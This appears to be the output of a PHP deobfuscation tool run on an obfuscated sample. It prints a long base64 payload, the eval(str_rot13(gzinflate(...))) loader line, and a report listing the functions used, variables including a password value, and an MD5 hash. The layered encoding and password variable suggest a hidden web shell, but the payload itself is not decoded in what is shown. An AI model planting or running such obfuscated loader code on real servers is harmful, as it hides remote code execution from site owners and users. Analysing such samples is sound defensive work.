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";
eval(str_rot13(gzinflate(str_rot13(base64_decode(($h3xagon))))));

Function Calls

gzinflate 1
str_rot13 2
base64_decode 1

Variables

$h3xagon 7b17W9u41j78aue65jt1MuwGnk8SArQFCjNACZSW86GFtr/sOLUdDmh5J2Rk..
$h3xagon_pass mhantabmhanx

Stats

MD5 db2fd756c2e5906a116525874b17e5df
Eval Count 1
Decode Time 401 ms